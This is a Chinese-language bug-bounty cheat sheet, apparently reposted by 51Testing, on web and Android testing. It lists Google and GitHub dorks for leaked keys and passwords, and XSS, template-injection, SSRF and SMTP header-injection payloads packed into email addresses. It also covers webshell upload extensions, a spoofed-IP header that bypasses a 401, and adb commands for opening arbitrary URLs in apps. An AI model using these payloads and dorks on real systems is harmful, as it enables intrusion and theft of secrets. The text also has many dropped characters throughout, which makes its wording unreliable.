訪問隱藏的注冊頁面
在Burp Suite過濾垃圾的包
Burp Suite>Proxy>Options>TLS Pass Through
highlighter- jboss-cli
.*\.google\.com
.*\.gstatic\.com
.*\.googleapis\.com
.*\.pki\.goog
.*\.mozilla\..*
現在,所有連接到這些主機的底層連接將直接繞過他們,而不通過代理。
Google dorks語法
highlighter- vim
inurl:example.com intitle:"index of"
inurl:example.com intitle:"index of /" "*key.pem"
inurl:example.com ext:log
inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv
inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git
https://www.exploit-db.com/google-hacking-database
電郵件地址payloads
下面的payloads都是有效的電子郵件地址,我們可以用來對基于網絡的電子郵件系統進 測試。
XSS (Cross-Site Scripting):
highlighter- typescript
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
模板注 :
highlighter- elixir
"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com
SQL 注 :
SSRF (Server-Side Request Forgery):
highlighter- stata
john.doe@abc123.burpcollaborator.net
john.doe@[127.0.0.1]
(Email) 頭注 :
highlighter- perl
"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"recipient@test.com>\r\nRCPT TO:<victim+"@test.com
文件上傳漏洞匯總
以下是上傳的 列表,你可以通過上傳來實現這些類型漏洞。
·ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
· SVG: 存儲 XSS / SSRF / XXE
· GIF: 存儲 XSS / SSRF
· CSV: CSV 注
· XML: XXE
· AVI: LFI / SSRF
· HTML / JS : HTML 注 / XSS / 開放重定向
· PNG / JPEG: 像素洪 攻擊 (DoS)
· ZIP: RCE via LFI / DoS
· PDF / PPTX: SSRF / 盲打 XXE
查找javascript 件
gau和httpx
這里有一個偵察技巧,使 gau 和 httpx實用程序找到我們目標上托管的javascript 件。
highlighter- vim
echo target.com | gau | grep '\.js$' | httpx -status-code -mc 200 -content-type
| grep 'application/javascript'
這個組合要做的是,它將從AlienVault的Open Threat Exchange(OTX)、Wayback Machine和Common。
Crawl中收集我們 標的所有已知URL,使 httpx獲取它們,然后只顯示javascript 件。
為了使這個組合 作,我們必須安裝以下工具:
https://github.com/projectdiscovery/httpx
https://github.com/lc/gau
gau
1. 收集你的目標的所有鏈接:
cat hosts | sed 's/https\ :\/\///' | gau > urls.txt
2. 過濾掉javascript URL:
cat urls.txt | grep -P "\w+\.js(\ |$)" | sort -u > jsurls.txt
3. 使用ffuf只獲取有效的鏈接,并將其直接發送到Burp中。:
ffuf -mc 200 -w jsurls.txt:HFUZZ -u HFUZZ -replay-proxy http://127.0.0.1:8080
4. 使 Scan Check Builder Burp擴展,添加被動配置 件提取 "accessToken "或 “access_token”。
5. 在Burp中對這些javascript鏈接運 被動掃描。
6. 提取發現的令牌,并在報告前對其進 驗證。
highlighter- coq
cat hosts | ./gau | cut -d" " -f1 | grep -E "\.js( :onp ) $" | tee urls.txt
使用httpx和subjs收集JavaScript 件
highlighter- gherkin
cat domains | httpx -silent | subjs | anew
文件上傳擴展名
· ASP:
highlighter- asciidoc
.aspx
.config
.ashx
.asmx
.aspq
.axd
.cshtm
.cshtml
.rem
.soap
.vbhtm
.vbhtml
.asa
.asp
.cer
.shtml
· PHP:
highlighter- stylus
.php
.php5
.php3
.php2
.shtml
.html
.php.png
(double extension attack)
401認證繞過
這是 個有趣的提示,可以幫助你找到認證繞過漏洞。
Request:
highlighter- apache
GET /delete user=test HTTP/1.1
Response:
HTTP/1.1 401 Unauthorized
現在讓我們試試這個。
highlighter- apache
Request:
GET /delete user=test HTTP/1.1 X-Custom-IP-Authorization: 127.0.0.1
Response:
HTTP/1.1 302 Found
當前端使 添加的 定義HTTP頭(X-Custom-IP-Authorization)時,這可能會起作 –例如,當它被用來識別通過負載均衡器連接到Web服務器的客戶端的原始IP地址時。
通過識別 是127.0.0.1,我們可能會規避Web應 程序的訪問控制,并執 特權操作。
使 GitHub dorks發現secrets
highlighter- irpf90
1. “target.com” send_keys
2. “target.com” password
3. “target.com” api_key
4. “target.com” apikey
5. “target.com” jira_password
6. “target.com” root_password
7. “target.com” access_token
8. “target.com” config
9. “target.com” client_secret
10. “target.com” user auth
驗證:https://github.com/streaak/keyhacks
圖像XSS
highlighter- php-template
<img src=x onerror=alert('XSS')>.png
"><img src=x onerror=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png
請注意,這可能只在基于UNIX的系統上 作,因為Windows不接受特殊字符作為 件名。然而,作為 種反射的XSS,它應該普遍適用。
在Android應 中打開任意URL
尋找 種簡單的 法來打開Android應 中的任意URL?
1. 下載jadx反編譯器并安裝adb。
2. 打開AndroidManifest.xml
3. 查找所有瀏覽器活動(必須包含 <category. andoid:name=“android.intent.category.BROWSABLE”/> )。
為每個活動(或您的任何域)運 " adb shell am start -n app_package_name/component_name -a android.intent.action.view -d google.com "。
同時在Burp中跟蹤任何對google.com或你的域名的請求。
4. 如果一個域名被打開,這意味著你發現了 個漏洞! 現在檢查請求是否包含任何auth令牌(如果是,說明你的賬戶被接管了!)。沒有?嘗試不同的技術來獲取任何PII。在最壞的情況下,如果你能在
個應 程序中打開任意鏈接,你會得到像XSS 樣的獎勵。
請注意,我們可以使 apktool來代替jadx反編譯器,它有更好的能 從APK中解碼
AndroidManifest.xml 件。
如果你使 的是Kali Linux,最簡單的 法就是使 apt.apktool來獲取所有必要的程序。
highlighter- mipsasm
apt-get -y install adb jadx apktool
12款安卓安全測試工具列表:
這是 個當今最好的Android安全測試 具的集合。
1、Dex2JAR - 套 于Android Dex和Java CLASS 件的 具。
2、ByteCodeView - Java & Android APK 逆向 程套件 (反編譯器,編輯器,調試器等)
3、JADX - Dex轉Java反編譯 具, 于從Android Dex和APK 件 成Java源代碼。
4、JD-GUI - 個獨 的圖形化 具, 于顯示來 CLASS 件的Java源。
5、Drozer - 個全 的Android安全測試框架。
6、Baksmali - Dalvik(Android的Java)使 的Dex格式的匯編器/反匯編器。
7、AndroGuard - 把 于分析、反編譯和逆轉Android應 程序的瑞 軍 。
8、ApkTool - 另 個反向 程Android應 程序的瑞 軍 具。
9、QARK - 于查找多個安全相關的Android應 漏洞的 具。
10、AndroBugs - 另 個 于識別Android應 程序中安全漏洞的分析 具。
11、AppMon - 于監控和篡改本地macOS、iOS和Android應 的系統API調 的 動化框架。
12、MobSF - 個 持Android,iOS和Windows移動應 的 體化 動化移動安全框架。
真的是 個了不起的 具列表,不僅僅是 于Android應 的反轉!有些擅 靜態分析,有些 于動態分析,有些則是兩者兼 有之,但所有這些 具都是開源且免費使用的。
其中有些擅長靜態分析,有些 于動態分析,有些則是兩者兼 有之,但所有這些工具都是開源的, 且可以免費使用。
本文內容不用于商業目的,如涉及知識產權問題,請權利人聯系51Testing小編(021-64471599-8017),我們將立即處理